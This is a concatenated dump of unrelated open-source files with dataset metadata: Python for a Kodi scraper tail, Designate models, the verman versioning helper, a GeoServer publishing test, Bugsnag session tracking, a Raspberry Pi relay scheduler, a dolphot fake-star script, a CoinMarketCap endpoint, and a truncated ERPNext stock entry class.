if kodi.get_setting('error_notify') == "true":
kodi.notify(header='Putlocker Movies',msg='(error) %s %s' % (str(e), ''),duration=5000,sound=None)
return hosters
|
gpl-2.0
| 3,591,408,890,174,926,000
| 40.033943
| 197
| 0.563311
| false
| 3.40026
| false
| false
| false
|
melodous/designate
|
designate/sqlalchemy/models.py
|
1
|
1881
|
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Author: Patrick Galbraith <patg@hp.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.db.sqlalchemy import models
from oslo.db import exception as oslo_db_exc
from sqlalchemy import Column, DateTime
from sqlalchemy.exc import IntegrityError
from sqlalchemy.types import CHAR
from designate.openstack.common import timeutils
from designate import exceptions
class Base(models.ModelBase):
# TODO(ekarlso): Remove me when o.db patch lands for this.
def save(self, session):
"""Save this object"""
session.add(self)
try:
session.flush()
except oslo_db_exc.DBDuplicateEntry as e:
raise exceptions.Duplicate(str(e))
except IntegrityError:
raise
def delete(self, session):
session.delete(self)
session.flush()
# TODO(ekarlso): Get this into o.db?
class SoftDeleteMixin(object):
deleted = Column(CHAR(32), nullable=False, default="0", server_default="0")
deleted_at = Column(DateTime, nullable=True, default=None)
def soft_delete(self, session):
"""Mark this object as deleted."""
self.deleted = self.id.replace('-', '')
self.deleted_at = timeutils.utcnow()
if hasattr(self, 'status'):
self.status = "DELETED"
self.save(session=session)
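# Usage sketch (illustrative): concrete models mix these classes into the
# project's declarative base; the model and columns below are hypothetical.
#
#   class Record(BASE, Base, SoftDeleteMixin):
#       __tablename__ = 'records'
#       id = Column(CHAR(32), primary_key=True)
#
#   record.soft_delete(session)   # sets deleted/deleted_at (and status) and saves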
|
apache-2.0
| -4,693,961,072,000,867,000
| 32
| 79
| 0.694312
| false
| 4.036481
| false
| false
| false
|
biocore/verman
|
verman/__init__.py
|
1
|
9290
|
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Copyright (c) 2013, The BiPy Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
__credits__ = ["Daniel McDonald", "Jai Ram Rideout", "Yoshiki Vazquez Baeza"]
import os
import subprocess
class Version(object):
"""Represent module version information
This is inspired by Python's sys.version_info
"""
def __init__(self, package, major, minor, micro=None, releaselevel=None, init_file=None):
if not isinstance(package, str):
raise TypeError("Package must be a string")
if not isinstance(major, int):
raise TypeError("Major version must be an integer")
if not isinstance(minor, int):
raise TypeError("Minor version must be an integer")
if micro is not None and not isinstance(micro, int):
raise TypeError("Micro version must be an integer")
if releaselevel is not None and not isinstance(releaselevel, str):
raise TypeError("Releaselevel must be a string")
if init_file is not None and not os.path.exists(init_file):
raise ValueError("init_file must exist if provided")
self.package = package
self.major = major
self.minor = minor
self.micro = micro
self.releaselevel = releaselevel
self.init_file = init_file
@property
def mmm(self):
"""major.minor.micro version string"""
if self.micro is None:
return "%d.%d" % (self.major, self.minor)
else:
return "%d.%d.%d" % (self.major, self.minor, self.micro)
def __str__(self):
"""Return a version string"""
if self.micro is None:
base = "%d.%d" % (self.major, self.minor)
else:
base = "%d.%d.%d" % (self.major, self.minor, self.micro)
if self.releaselevel is not None:
base = "%s-%s" % (base, self.releaselevel)
git_branch = self.git_branch()
git_sha1 = self.git_sha1()
if git_branch is not None:
return "%s, %s@%s" % (base, git_branch, git_sha1)
else:
return base
def __repr__(self):
"""Return version information similar to Python's sys.version_info"""
name = "%s_version" % self.package
major = "major=%d" % self.major
minor = "minor=%d" % self.minor
items = [major, minor]
if self.micro is not None:
items.append("micro=%s" % self.micro)
if self.releaselevel is not None:
items.append("releaselevel='%s'" % self.releaselevel)
git_branch = self.git_branch()
git_sha1 = self.git_sha1(truncate=False)
if git_branch is not None:
git_branch = "git_branch='%s'" % git_branch
git_sha1 = "git_sha1='%s'" % git_sha1
items.append(git_branch)
items.append(git_sha1)
return "%s(%s)" % (name, ', '.join(items))
def git_branch(self):
"""Get the current branch (if applicable)
This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has
given explicit permission for this code to be licensed under BSD. The
discussion can be found here https://github.com/wasade/verman/issues/1
"""
if self.init_file is None:
return None
pkg_dir = self.package_dir()
branch_cmd = 'git --git-dir %s/.git rev-parse --abbrev-ref HEAD' %\
(pkg_dir)
branch_o, branch_e, branch_r = self.verman_system_call(branch_cmd)
git_branch = branch_o.strip()
if self._is_valid_git_refname(git_branch):
return git_branch
else:
return None
def git_sha1(self, truncate=True):
"""Get the current git SHA1 (if applicable)
This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has
given explicit permission for this code to be licensed under BSD. The
discussion can be found here https://github.com/wasade/verman/issues/1
"""
if self.init_file is None:
return None
pkg_dir = self.package_dir()
sha_cmd = 'git --git-dir %s/.git rev-parse HEAD' % (pkg_dir)
sha_o, sha_e, sha_r = self.verman_system_call(sha_cmd)
git_sha = sha_o.strip()
if self._is_valid_git_sha1(git_sha):
if truncate:
return git_sha[0:7]
else:
return git_sha
else:
return None
def _is_valid_git_refname(self, refname):
"""check if a string is a valid branch-name/ref-name for git
Input:
refname: string to validate
Output:
True if 'refname' is a valid branch name in git. False if it fails to
meet any of the criteria described in the man page for
'git check-ref-format', also see:
http://www.kernel.org/pub/software/scm/git/docs/git-check-ref-format.html
This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has
given explicit permission for this code to be licensed under BSD. The
discussion can be found here https://github.com/wasade/verman/issues/1
"""
if len(refname) == 0:
return False
# git imposes a few requirements to accept a string as a
# refname/branch-name
# They can include slash / for hierarchical (directory) grouping, but no
# slash-separated component can begin with a dot . or end with the
# sequence .lock
if (len([True for element in refname.split('/')
if element.startswith('.') or element.endswith('.lock')]) != 0):
return False
# They cannot have two consecutive dots .. anywhere
if '..' in refname:
return False
        # They cannot have ASCII control characters (i.e. bytes whose values are
        # lower than \040 octal (32 decimal), or \177 octal (127 decimal, DEL)),
        # space, tilde, caret ^, or colon : anywhere
        if len([True for refname_char in refname if ord(refname_char) < 0o40 or
                ord(refname_char) == 0o177]) != 0:
            return False
if ' ' in refname or '~' in refname or '^' in refname or ':' in refname:
return False
# They cannot have question-mark ?, asterisk *, or open bracket [
# anywhere
if '?' in refname or '*' in refname or '[' in refname:
return False
# They cannot begin or end with a slash / or contain multiple
# consecutive slashes
if refname.startswith('/') or refname.endswith('/') or '//' in refname:
return False
# They cannot end with a dot ..
if refname.endswith('.'):
return False
# They cannot contain a sequence @{
if '@{' in refname:
return False
# They cannot contain a \
if '\\' in refname:
return False
return True
def _is_valid_git_sha1(self, possible_hash):
"""check if a string is a valid git sha1 string
Input:
possible_hash: string to validate
Output:
True if the string has 40 characters and is an hexadecimal number, False
otherwise.
This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has
given explicit permission for this code to be licensed under BSD. The
discussion can be found here https://github.com/wasade/verman/issues/1
"""
if len(possible_hash) != 40:
return False
try:
_ = int(possible_hash, 16)
except ValueError:
return False
return True
def package_dir(self):
"""Returns the top-level package directory
This code was adapted from QIIME. The author, Greg Caporaso, has given
explicit permission for this code to be licensed under BSD. The
discussion can be found here: https://github.com/wasade/verman/issues/1
"""
# Get the full path of the module containing an instance of Version
if self.init_file is None:
return None
current_file_path = os.path.abspath(self.init_file)
# Get the directory
current_dir_path = os.path.dirname(current_file_path)
# Return the directory containing the directory containing the instance
return os.path.dirname(current_dir_path)
def verman_system_call(self, cmd):
"""Issue a system call
This code is based off of pyqi's pyqi_system_call
"""
proc = subprocess.Popen(cmd, shell=True, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# communicate pulls all stdout/stderr from the PIPEs to
# avoid blocking -- don't remove this line!
stdout, stderr = proc.communicate()
return_value = proc.returncode
return stdout, stderr, return_value
verman_version = Version("verman", 1, 1, 1, init_file=__file__)
__version__ = verman_version.mmm
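# Usage sketch (added for illustration; not part of the original module):
# downstream packages typically expose their own Version instance, e.g.
#
#   from verman import Version
#   mypkg_version = Version("mypkg", 0, 3, 0, init_file=__file__)
#   __version__ = mypkg_version.mmm    # "0.3.0"
if __name__ == '__main__':
    # Running this module directly prints its own version information; in a
    # git checkout str() appends "branch@sha1", from a tarball it does not.
    print(verman_version)
    print(repr(verman_version))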
|
bsd-3-clause
| -6,532,921,692,975,337,000
| 33.535316
| 93
| 0.583423
| false
| 4.117908
| false
| false
| false
|
CCSS-CZ/layman
|
server/tests/layedtest.py
|
1
|
3969
|
import os,sys
import unittest
import ConfigParser
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
INSTALL_DIR = os.path.abspath(os.path.join(TEST_DIR,".."))
sys.path.append(os.path.join(INSTALL_DIR))
import json
from layman.layed import LayEd
from layman.layed import GsRest
class LayEdTestCase(unittest.TestCase):
"""Test of the auth module"""
le = None # LayEd
workdir = None
cfg = None
def setUp(self):
cfg = ConfigParser.SafeConfigParser()
cfg.read((os.path.join(TEST_DIR,"tests.cfg")))
cfg.set("FileMan","testdir",TEST_DIR)
self.le = LayEd(cfg)
self.gsr = GsRest(cfg)
self.config = cfg
self.workdir = os.path.abspath(os.path.join(TEST_DIR,"workdir","data"))
# TODO: add tests for POST /layed?myLayer
def test_01_publish(self):
# ff = "world_cities_point.shp" # file
# ll = "world_cities_point" # layer
# st = "world_cities_point" # style
# ff = "pest.shp" # file
# ll = "pest" # layer
# st = "pest" # style
ff = "line_crs.shp" # file
ll = "line_crs" # layer
st = "line_crs" # style
ws = "mis" # workspace
ds = "testschema" # datastore
sch = "testschema" # schema
# Check #
# Check if the layer is not already there
(head, cont) = self.gsr.getLayer(ws, ll)
self.assertNotEquals("200", head["status"], "The layer already exists. Please, remove it manually." )
# Check if the style is not already there
(head, cont) = self.gsr.getStyle(ws, st)
self.assertNotEquals("200", head["status"], "The style already exists. Please, remove it manually." )
# Publish #
self.le.publish(fsUserDir=self.workdir, fsGroupDir="", dbSchema=ds, gsWorkspace=ws, fileName=ff)
# Test #
# Check if the layer is there
(head, cont) = self.gsr.getLayer(ws, ll)
self.assertEquals("200", head["status"], "The layer is not there. Was it created under another name?")
# Check the style of the layer
layerJson = json.loads(cont)
styleName = layerJson["layer"]["defaultStyle"]["name"]
        self.assertEquals(st, styleName, "The layer is there, but it has wrong style assigned.")
# Check if the style is there
(head, cont) = self.gsr.getStyle(ws, st)
self.assertEquals("200", head["status"], "The style is not there." )
#def test_02_delete(self):
# Checks #
# Check that the layer is there
#(head, cont) = self.gsr.getLayer("dragouni", "line_crs")
#self.assertEquals("200", head["status"], "The layer line_crs is not there. Was it created under another name?")
# Check that the style is there
#(head, cont) = self.gsr.getStyle("dragouni", "line_crs")
#self.assertEquals("200", head["status"], "The style line_crs is not there." )
# Delete #
# Delete layer (including feature type, style and datastore)
#self.le.deleteLayer(workspace="dragouni", layer="line_crs", deleteStore=True)
# Test #
# Check that the layer is not there
#(head, cont) = self.gsr.getLayer("dragouni", "line_crs")
#self.assertNotEquals("200", head["status"], "The layer line_crs still exists, should be already deleted." )
# Check that the style is not there
#(head, cont) = self.gsr.getStyle("dragouni", "line_crs")
#self.assertNotEquals("200", head["status"], "The style line_crs already exists, should be already deleted." )
# Check that the data store is not there
#(head, cont) = self.gsr.getDataStore("dragouni", "line_crs")
#self.assertNotEquals("200", head["status"], "The data store line_crs already exists, should be already deleted." )
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(LayEdTestCase)
unittest.TextTestRunner(verbosity=2).run(suite)
|
gpl-3.0
| -507,578,213,640,657,300
| 35.75
| 123
| 0.615772
| false
| 3.595109
| true
| false
| false
|
bugsnag/bugsnag-python
|
bugsnag/sessiontracker.py
|
1
|
4934
|
from copy import deepcopy
from uuid import uuid4
from time import strftime, gmtime
from threading import Lock, Timer
from typing import List, Dict, Callable
import atexit
try:
from contextvars import ContextVar
_session_info = ContextVar('bugsnag-session', default={}) # type: ignore
except ImportError:
from bugsnag.utils import ThreadContextVar
# flake8: noqa
_session_info = ThreadContextVar('bugsnag-session', default={}) # type: ignore
from bugsnag.utils import package_version, FilterDict, SanitizingJSONEncoder
from bugsnag.event import Event
__all__ = [] # type: List[str]
class SessionTracker:
MAXIMUM_SESSION_COUNT = 100
SESSION_PAYLOAD_VERSION = "1.0"
"""
Session tracking class for Bugsnag
"""
def __init__(self, configuration):
self.session_counts = {} # type: Dict[str, int]
self.config = configuration
self.mutex = Lock()
self.auto_sessions = False
self.delivery_thread = None
def start_session(self):
if not self.auto_sessions and self.config.auto_capture_sessions:
self.auto_sessions = True
self.__start_delivery()
start_time = strftime('%Y-%m-%dT%H:%M:00', gmtime())
new_session = {
'id': uuid4().hex,
'startedAt': start_time,
'events': {
'handled': 0,
'unhandled': 0
}
}
_session_info.set(new_session)
self.__queue_session(start_time)
def send_sessions(self):
self.mutex.acquire()
try:
sessions = []
for min_time, count in self.session_counts.items():
sessions.append({
'startedAt': min_time,
'sessionsStarted': count
})
self.session_counts = {}
finally:
self.mutex.release()
self.__deliver(sessions)
def __start_delivery(self):
if self.delivery_thread is None:
def deliver():
self.send_sessions()
self.delivery_thread = Timer(30.0, deliver)
self.delivery_thread.daemon = True
self.delivery_thread.start()
self.delivery_thread = Timer(30.0, deliver)
self.delivery_thread.daemon = True
self.delivery_thread.start()
def cleanup():
if self.delivery_thread is not None:
self.delivery_thread.cancel()
self.send_sessions()
atexit.register(cleanup)
def __queue_session(self, start_time: str):
self.mutex.acquire()
try:
if start_time not in self.session_counts:
self.session_counts[start_time] = 0
self.session_counts[start_time] += 1
finally:
self.mutex.release()
def __deliver(self, sessions: List[Dict]):
if not sessions:
self.config.logger.debug("No sessions to deliver")
return
if not self.config.api_key:
self.config.logger.debug(
"Not delivering due to an invalid api_key"
)
return
if not self.config.should_notify():
self.config.logger.debug("Not delivering due to release_stages")
return
notifier_version = package_version('bugsnag') or 'unknown'
payload = {
'notifier': {
'name': Event.NOTIFIER_NAME,
'url': Event.NOTIFIER_URL,
'version': notifier_version
},
'device': FilterDict({
'hostname': self.config.hostname,
'runtimeVersions': self.config.runtime_versions
}),
'app': {
'releaseStage': self.config.release_stage,
'version': self.config.app_version
},
'sessionCounts': sessions
}
try:
encoder = SanitizingJSONEncoder(
self.config.logger,
separators=(',', ':'),
keyword_filters=self.config.params_filters
)
encoded_payload = encoder.encode(payload)
self.config.delivery.deliver_sessions(self.config, encoded_payload)
except Exception as e:
self.config.logger.exception('Sending sessions failed %s', e)
class SessionMiddleware:
"""
Session middleware ensures that a session is appended to the event.
"""
def __init__(self, bugsnag: Callable[[Event], Callable]):
self.bugsnag = bugsnag
def __call__(self, event: Event):
session = _session_info.get()
if session:
if event.unhandled:
session['events']['unhandled'] += 1
else:
session['events']['handled'] += 1
event.session = deepcopy(session)
self.bugsnag(event)
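# Usage sketch (illustrative): the bugsnag client owns this wiring, but the
# public surface above can be exercised directly given a Configuration object.
#
#   tracker = SessionTracker(config)
#   tracker.start_session()    # record a session for the current context
#   tracker.send_sessions()    # flush queued counts now instead of on the timer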
|
mit
| 8,336,604,068,259,510,000
| 30.031447
| 83
| 0.551074
| false
| 4.397504
| true
| false
| false
|
BirchJD/RPiTimer
|
PiTimer_Step-4/Schedule.py
|
1
|
5941
|
# PiTimer - Python Hardware Programming Education Project For Raspberry Pi
# Copyright (C) 2015 Jason Birch
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#/****************************************************************************/
#/* PiTimer - Step 4 - Schedule functions. */
#/* ------------------------------------------------------------------------ */
#/* V1.00 - 2015-07-04 - Jason Birch */
#/* ------------------------------------------------------------------------ */
#/* Class to handle scheduling events for specific relays. Such as adding, */
#/* removing, displaying, sorting. */
#/****************************************************************************/
import datetime
import ScheduleItem
#/****************************************************************************/
#/* Function to return the schedule date of a schedule item for when sorting */
#/* the items using the Python list sort feature. */
#/****************************************************************************/
def SortGetKey(Object):
return Object.GetScheduleDate()
class Schedule:
def __init__(self):
# Define an array to store the schedule items in.
self.ScheduleItems = []
#/*********************************************/
#/* Get the item at the specific array index. */
#/*********************************************/
def GetItem(self, ItemIndex):
if len(self.ScheduleItems) > ItemIndex:
return self.ScheduleItems[ItemIndex]
else:
return False
#/**************************************************/
#/* Find the schedule item with the specificed ID. */
#/**************************************************/
def FindItem(self, FindItemID):
ThisItem = False
for ThisScheduleItem in self.ScheduleItems:
if ThisScheduleItem.GetItemID() == FindItemID:
ThisItem = ThisScheduleItem
return ThisItem
#/*******************************************************/
#/* Function to display the current schedule of events. */
#/* In a tabulated form. */
#/*******************************************************/
def DisplaySchedule(self, SelectedItemID):
if len(self.ScheduleItems):
self.ScheduleItems[0].DisplayHeader()
for ThisScheduleItem in self.ScheduleItems:
if SelectedItemID == ThisScheduleItem.GetItemID():
SelectLeftChar = ">"
SelectRightChar = "<"
else:
SelectLeftChar = " "
SelectRightChar = " "
ThisScheduleItem.DisplayItem(SelectLeftChar, SelectRightChar)
if len(self.ScheduleItems):
self.ScheduleItems[0].DisplayFooter()
#/*************************************************/
#/* Add a new schedule item to the schedle array. */
#/*************************************************/
def AddSchedule(self, NewRelayNumber, NewScheduleDate, NewRelayState, NewRepeat):
self.ScheduleItems.append(ScheduleItem.ScheduleItem(NewRelayNumber, NewScheduleDate, NewRelayState, NewRepeat))
self.SortSchedule()
#/**************************************************/
#/* Delete a schedule item from the schedle array. */
#/**************************************************/
def DelSchedule(self, ItemID):
ThisScheduleItem = self.FindItem(ItemID)
if ThisScheduleItem:
self.ScheduleItems.remove(ThisScheduleItem)
self.SortSchedule()
#/*********************************************/
#/* Sort the list of schedule items so the */
#/* expired items are at the top of the list. */
#/*********************************************/
def SortSchedule(self):
self.ScheduleItems.sort(key=SortGetKey)
#/*************************************************************************/
#/* If the top schedule item is in the past return it's ID as being */
#/* triggered. The schedule items are kept in date order, so the top item */
#/* is the one which will trigger first. The calling function is */
#/* responsible for removing the triggered item from the scheduled items */
#/* or updating the scheduled item if the item is to be repeated once */
#/* the calling function has processed it; by calling the function: */
#/* SetNextScheduleDate(). */
#/*************************************************************************/
def ScheduleTrigger(self):
ThisItemID = False
Now = datetime.datetime.now()
ThisItem = self.GetItem(0)
if ThisItem and ThisItem.GetScheduleDate() <= Now:
ThisItemID = ThisItem.GetItemID()
return ThisItemID
#/*********************************************************************/
#/* Set the date and time of the specified schedule item to it's next */
#/* trigger date/time. If the item does not have a repeat period, */
#/* remove the schedule item. */
#/*********************************************************************/
def SetNextScheduleDate(self, ThisItemID):
ThisItem = self.FindItem(ThisItemID)
if ThisItem and ThisItem.SetNextScheduleDate() == False:
self.DelSchedule(ThisItemID)
self.SortSchedule()
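# Usage sketch (illustrative): a polling loop consumes triggered items and
# advances repeating ones. Relay switching is application specific, and the
# repeat argument's type is defined by ScheduleItem (not shown here).
#
#   ThisSchedule = Schedule()
#   ThisSchedule.AddSchedule(1, datetime.datetime.now(), True, RepeatPeriod)
#   ItemID = ThisSchedule.ScheduleTrigger()
#   if ItemID is not False:
#       # ... switch the relay hardware here ...
#       ThisSchedule.SetNextScheduleDate(ItemID)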
|
gpl-3.0
| -9,058,749,069,529,155,000
| 40.838028
| 117
| 0.497391
| false
| 4.837948
| false
| false
| false
|
dweisz/pydolphot
|
make_fakerun.py
|
1
|
2967
|
import numpy as np
import sys
import subprocess
import os
'''
def makephotfiles(base, nstart, nruns, nimages):
for i in range(nstart,nstart+nruns):
for j in range(1, nimages+1):
subprocess.call("ln -s "+base+"."+np.str(j)+".res.fits " + base+"_"+np.str(i)+"."+np.str(j)+".res.fits", shell=True)
subprocess.call("ln -s "+base+"."+np.str(j)+".psf.fits " + base+"_"+np.str(i)+"."+np.str(j)+".psf.fits", shell=True)
subprocess.call("ln -s "+base+".info " + base+"_"+np.str(i)+".info", shell=True)
subprocess.call("ln -s "+base+".apcor " + base+"_"+np.str(i)+".apcor", shell=True)
subprocess.call("ln -s "+base+".psfs " + base+"_"+np.str(i)+".psfs", shell=True)
subprocess.call("ln -s "+base+".columns " + base+"_"+np.str(i)+".columns", shell=True)
subprocess.call("ln -s "+base + " " + base+"_"+np.str(i), shell=True)
'''
def makefakelist(photfile, filter1, filter2, fmin, fmax, cmin, cmax, nruns, nstars=15000, nstart=1):
for i in range(nstart, nstart+nruns):
subprocess.call('fakelist '+ np.str(photfile) + ' ' + np.str(filter1) + ' ' + np.str(filter2) + ' ' + np.str(fmin) + ' ' + np.str(fmax) + ' ' + np.str(cmin) + ' ' + np.str(cmax) + ' ' + "-nstar=" + np.str(nstars) + "> fake.list_" + np.str(i), shell=True)
subprocess.call('sleep 5', shell=True )
def makefakeparam(param_file, base, nruns, nstart=1):
infile = param_file
for i in range(nstart, nstart+nruns):
fakeparam = "phot.fake_"+np.str(i)+".param"
subprocess.call("cp "+infile+" "+fakeparam, shell=True)
outfile = fakeparam
f1 = open(fakeparam, 'a')
f1.write("ACSuseCTE = 1\n")
f1.write("WFC3useCTE = 1\n")
f1.write("RandomFake = 1\n")
f1.write("FakeMatch=3.0\n")
f1.write("FakePad=0\n")
f1.write("FakeStarPSF = 1.5\n")
f1.write("FakeOut="+base+"_fake_"+np.str(i)+".fake\n")
f1.write("FakeStars=fake.list_"+np.str(i)+"\n")
f1.close()
def makerunfake(param_file, base, nruns, nstart=1):
for i in range(nstart, nstart+nruns):
fakeparam = "phot.fake_"+np.str(i)+".param"
outfile = "runfake"+np.str(i)
f = open(outfile, 'w')
f.write("cd " + os.getcwd()+"\n")
f.write("dolphot " + base+ " -p" + fakeparam + " >> fake.log_"+np.str(i))
f.close()
subprocess.call("chmod +x " + outfile, shell=True)
'''
cd /clusterfs/dweisz/photometry/leop/
dolphot leop_acs.phot_1 -pleop.fake.param_1 >> fake1.log
'''
#if __name__ == '__main__':
base = sys.argv[1] # e.g., test.phot
#rundir = sys.argv[2]
#nimages = np.int(sys.argv[3])
#name = sys.argv[3]
param_file = sys.argv[2] # name of photometry parameter file
nruns = int(sys.argv[3])
filters = sys.argv[4]
f1min = float(sys.argv[5])
f1max = float(sys.argv[6])
c1min = float(sys.argv[7])
c1max = float(sys.argv[8])
#nimages = 12
#nruns = 72
#makephotfiles(base, 1, nruns , nimages)
makefakeparam(param_file, base, nruns)
makerunfake(param_file, base, nruns)
makefakelist(base, filters.split()[0], filters.split()[1], f1min, f1max, c1min, c1max, nruns)
#main()
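# Example invocation (a sketch; the file names and limits below are hypothetical):
#   python make_fakerun.py test.phot phot.param 10 "F475W F814W" 20.0 28.0 -1.0 3.0
# This writes phot.fake_1..10.param, runfake1..10 and fake.list_1..10 for test.phot.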
|
mit
| 4,988,895,559,438,587,000
| 31.25
| 256
| 0.624874
| false
| 2.345455
| false
| false
| false
|
collab-project/luma.cryptocurrency
|
luma/cryptocurrency/endpoint/coinmarketcap.py
|
1
|
1134
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Thijs Triemstra and contributors
# See LICENSE.rst for details.
"""
Endpoint for coinmarketcap.com
:see: https://coinmarketcap.com/api/
"""
from datetime import datetime
from dateutil.tz.tz import tzutc
from . import Endpoint, EndpointResponse
class CoinmarketcapResponse(EndpointResponse):
@property
def data(self):
return self.json_data[0]
def parse_price(self):
return float(self.data.get('price_{}'.format(
self.currency_code.lower())))
def parse_price_in_btc(self):
return float(self.data.get('price_btc'))
def parse_timestamp(self):
return datetime.fromtimestamp(
int(self.data.get('last_updated')), tz=tzutc())
class Coinmarketcap(Endpoint):
responseType = CoinmarketcapResponse
def get_url(self):
base = 'https://api.coinmarketcap.com/{api_version}/ticker/{coin}/'
if self.currency_code != 'USD':
base += '?convert={}'.format(self.currency_code)
return base.format(
api_version=self.api_version,
coin=self.coin
)
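    # Illustrative result (a sketch; `api_version`, `coin` and `currency_code`
    # are attributes assumed to be set by the Endpoint base class):
    #   coin='bitcoin', api_version='v1', currency_code='EUR' ->
    #   https://api.coinmarketcap.com/v1/ticker/bitcoin/?convert=EUR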
|
mit
| 1,155,416,785,745,923,300
| 22.625
| 75
| 0.640212
| false
| 3.623003
| false
| false
| false
|
rohitwaghchaure/New_Theme_Erp
|
erpnext/stock/doctype/stock_entry/stock_entry.py
|
1
|
34617
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.defaults
from frappe.utils import cstr, cint, flt, comma_or, nowdate
from frappe import _
from erpnext.stock.utils import get_incoming_rate
from erpnext.stock.stock_ledger import get_previous_sle
from erpnext.controllers.queries import get_match_cond
from erpnext.stock.get_item_details import get_available_qty
class NotUpdateStockError(frappe.ValidationError): pass
class StockOverReturnError(frappe.ValidationError): pass
class IncorrectValuationRateError(frappe.ValidationError): pass
class DuplicateEntryForProductionOrderError(frappe.ValidationError): pass
from erpnext.controllers.stock_controller import StockController
form_grid_templates = {
"mtn_details": "templates/form_grid/stock_entry_grid.html"
}
class StockEntry(StockController):
fname = 'mtn_details'
def onload(self):
if self.docstatus==1:
for item in self.get(self.fname):
item.update(get_available_qty(item.item_code,
item.s_warehouse))
def validate(self):
self.validate_posting_time()
self.validate_purpose()
pro_obj = self.production_order and \
frappe.get_doc('Production Order', self.production_order) or None
self.set_transfer_qty()
self.validate_item()
self.validate_uom_is_integer("uom", "qty")
self.validate_uom_is_integer("stock_uom", "transfer_qty")
self.validate_warehouse(pro_obj)
self.validate_production_order(pro_obj)
self.get_stock_and_rate()
self.validate_incoming_rate()
self.validate_bom()
self.validate_finished_goods()
self.validate_return_reference_doc()
self.validate_with_material_request()
self.validate_fiscal_year()
self.validate_valuation_rate()
self.set_total_amount()
def on_submit(self):
from erpnext.stock.stock_custom_methods import validate_for_si_submitted
validate_for_si_submitted(self)
self.update_stock_ledger()
from erpnext.stock.doctype.serial_no.serial_no import update_serial_nos_after_submit
update_serial_nos_after_submit(self, "mtn_details")
self.update_production_order()
self.make_gl_entries()
def on_cancel(self):
self.update_stock_ledger()
self.update_production_order()
self.make_gl_entries_on_cancel()
def validate_fiscal_year(self):
from erpnext.accounts.utils import validate_fiscal_year
validate_fiscal_year(self.posting_date, self.fiscal_year,
self.meta.get_label("posting_date"))
def validate_purpose(self):
valid_purposes = ["Material Issue", "Material Receipt", "Material Transfer",
"Manufacture/Repack", "Subcontract", "Sales Return", "Purchase Return"]
if self.purpose not in valid_purposes:
frappe.throw(_("Purpose must be one of {0}").format(comma_or(valid_purposes)))
def set_transfer_qty(self):
for item in self.get("mtn_details"):
if not flt(item.qty):
frappe.throw(_("Row {0}: Qty is mandatory").format(item.idx))
item.transfer_qty = flt(item.qty * item.conversion_factor, self.precision("transfer_qty", item))
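	# e.g. (hypothetical figures) qty=5 boxes with conversion_factor=12 gives
	# transfer_qty=60 in the stock UOM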
def validate_item(self):
stock_items = self.get_stock_items()
serialized_items = self.get_serialized_items()
for item in self.get("mtn_details"):
if item.item_code not in stock_items:
frappe.throw(_("{0} is not a stock Item").format(item.item_code))
if not item.stock_uom:
item.stock_uom = frappe.db.get_value("Item", item.item_code, "stock_uom")
if not item.uom:
item.uom = item.stock_uom
if not item.conversion_factor:
item.conversion_factor = 1
if not item.transfer_qty:
item.transfer_qty = item.qty * item.conversion_factor
if (self.purpose in ("Material Transfer", "Sales Return", "Purchase Return")
and not item.serial_no
and item.item_code in serialized_items):
frappe.throw(_("Row #{0}: Please specify Serial No for Item {1}").format(item.idx, item.item_code),
frappe.MandatoryError)
def validate_warehouse(self, pro_obj):
"""perform various (sometimes conditional) validations on warehouse"""
source_mandatory = ["Material Issue", "Material Transfer", "Purchase Return"]
target_mandatory = ["Material Receipt", "Material Transfer", "Sales Return"]
validate_for_manufacture_repack = any([d.bom_no for d in self.get("mtn_details")])
if self.purpose in source_mandatory and self.purpose not in target_mandatory:
self.to_warehouse = None
for d in self.get('mtn_details'):
d.t_warehouse = None
elif self.purpose in target_mandatory and self.purpose not in source_mandatory:
self.from_warehouse = None
for d in self.get('mtn_details'):
d.s_warehouse = None
for d in self.get('mtn_details'):
if not d.s_warehouse and not d.t_warehouse:
d.s_warehouse = self.from_warehouse
d.t_warehouse = self.to_warehouse
if not (d.s_warehouse or d.t_warehouse):
frappe.throw(_("Atleast one warehouse is mandatory"))
if self.purpose in source_mandatory and not d.s_warehouse:
frappe.throw(_("Source warehouse is mandatory for row {0}").format(d.idx))
if self.purpose in target_mandatory and not d.t_warehouse:
frappe.throw(_("Target warehouse is mandatory for row {0}").format(d.idx))
if self.purpose == "Manufacture/Repack":
if validate_for_manufacture_repack:
if d.bom_no:
d.s_warehouse = None
if not d.t_warehouse:
frappe.throw(_("Target warehouse is mandatory for row {0}").format(d.idx))
elif pro_obj and cstr(d.t_warehouse) != pro_obj.fg_warehouse:
frappe.throw(_("Target warehouse in row {0} must be same as Production Order").format(d.idx))
else:
d.t_warehouse = None
if not d.s_warehouse:
frappe.throw(_("Source warehouse is mandatory for row {0}").format(d.idx))
if cstr(d.s_warehouse) == cstr(d.t_warehouse):
frappe.throw(_("Source and target warehouse cannot be same for row {0}").format(d.idx))
def validate_production_order(self, pro_obj=None):
if not pro_obj:
if self.production_order:
pro_obj = frappe.get_doc('Production Order', self.production_order)
